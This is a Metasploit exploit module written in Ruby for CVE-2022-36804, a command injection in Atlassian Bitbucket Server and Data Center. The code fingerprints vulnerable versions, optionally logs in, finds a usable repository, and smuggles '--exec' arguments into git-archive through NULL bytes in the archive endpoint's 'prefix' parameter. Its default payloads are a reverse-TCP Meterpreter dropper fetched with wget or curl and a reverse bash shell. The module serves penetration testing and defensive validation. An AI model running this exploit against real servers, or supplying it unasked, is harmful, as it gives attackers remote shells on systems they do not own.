## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Bitbucket Git Command Injection', 'Description' => %q{ Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint creates an archive of the repository, leveraging the `git-archive` command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands. }, 'License' => MSF_LICENSE, 'Author' => [ 'TheGrandPew', # discovery 'Ron Bowes', # analysis and PoC 'Jang', # testanull - PoC 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ], [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ], [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ], [ 'CVE', '2022-36804' ] ], 'Platform' => [ 'linux' ], 'Privileged' => false, 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], 'Targets' => [ [ 'Linux Dropper', { 'Platform' => 'linux', 'Type' => :linux_dropper, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'CmdStagerFlavor' => %w[wget curl bourne], 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => 'unix', 'Type' => :unix_cmd, 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => %(:/?#[]@) }, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' } } ] ], 'DisclosureDate' => '2022-08-24', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ IOC_IN_LOGS ], 'SideEffects' => [ REPEATABLE_SESSION ] } ) ) register_options( [ Opt::RPORT(7990), OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']), OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]), OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ]) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'login') ) return CheckCode::Unknown('Failed to receive response from application') unless res unless res.body.include?('Bitbucket') return CheckCode::Safe('Target does not appear to be Bitbucket') end footer = res.get_html_document&.at('footer') return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer version_str = footer.at('span')&.children&.text return CheckCode::Detected('Cannot find version string in footer') unless version_str matches = version_str.match(/v(\d+\.\d+\.\d+)/) return CheckCode::Detected('Version unknown') unless matches && matches.length > 1 version_str = matches[1] vprint_status("Found Bitbucket version: #{matches[1]}") num_vers = Rex::Version.new(version_str) return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17') major, minor, revision = version_str.split('.') case major when '6' return CheckCode::Appears when '7' case minor when '6' return CheckCode::Appears if revision.to_i < 17 when '17' return CheckCode::Appears if revision.to_i < 10 when '21' return CheckCode::Appears if revision.to_i < 4 end when '8' case minor when '0', '1' return CheckCode::Appears if revision.to_i < 3 when '2' return CheckCode::Appears if revision.to_i < 2 when '3' return CheckCode::Appears if revision.to_i < 1 end end CheckCode::Detected end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def authenticate print_status("Attempting to authenticate with user '#{username}' and password '#{password}'") res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'), 'keep_cookies' => true, 'vars_post' => { 'j_username' => username, 'j_password' => password, 'submit' => 'Log in' } ) fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'dashboard'), 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res unless res.body.include?('Your work') && res.body.include?('Projects') fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid') end @authenticated = true print_good('Successfully logged into Bitbucket!') end def find_public_repo print_status('Searching Bitbucket for publicly accessible repository') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'), 'keep_cookies' => true ) fail_with(Failure::Disconnected, 'Did not receive a response') unless res json_data = JSON.parse(res.body) fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data unless json_data['size'] > 0 fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories') end # opt for public repos unless none exist. # Attempt to use a private repo if so repos = json_data['values'] possible_repos = repos.select { |repo| repo['public'] == true } if possible_repos.empty? && @authenticated possible_repos = repos.select { |repo| repo['public'] == false } end fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty? possible_repos.each do |repo| project = repo['project'] next unless project @project = project['key'] @repo = repo['slug'] break if @project && @repo end fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo print_good("Found public repo '#{@repo}' in project '#{@project}'!") end def execute_command(cmd, _opts = {}) uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive') send_request_cgi( 'method' => 'GET', 'uri' => uri, 'keep_cookies' => true, 'vars_get' => { 'format' => 'zip', 'path' => Rex::Text.rand_text_alpha(2..5), 'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}" } ) end def exploit @authenticated = false authenticate unless username.blank? && password.blank? find_public_repo if target['Type'] == :linux_dropper execute_cmdstager(linemax: 6000) else execute_command(payload.encoded) end end end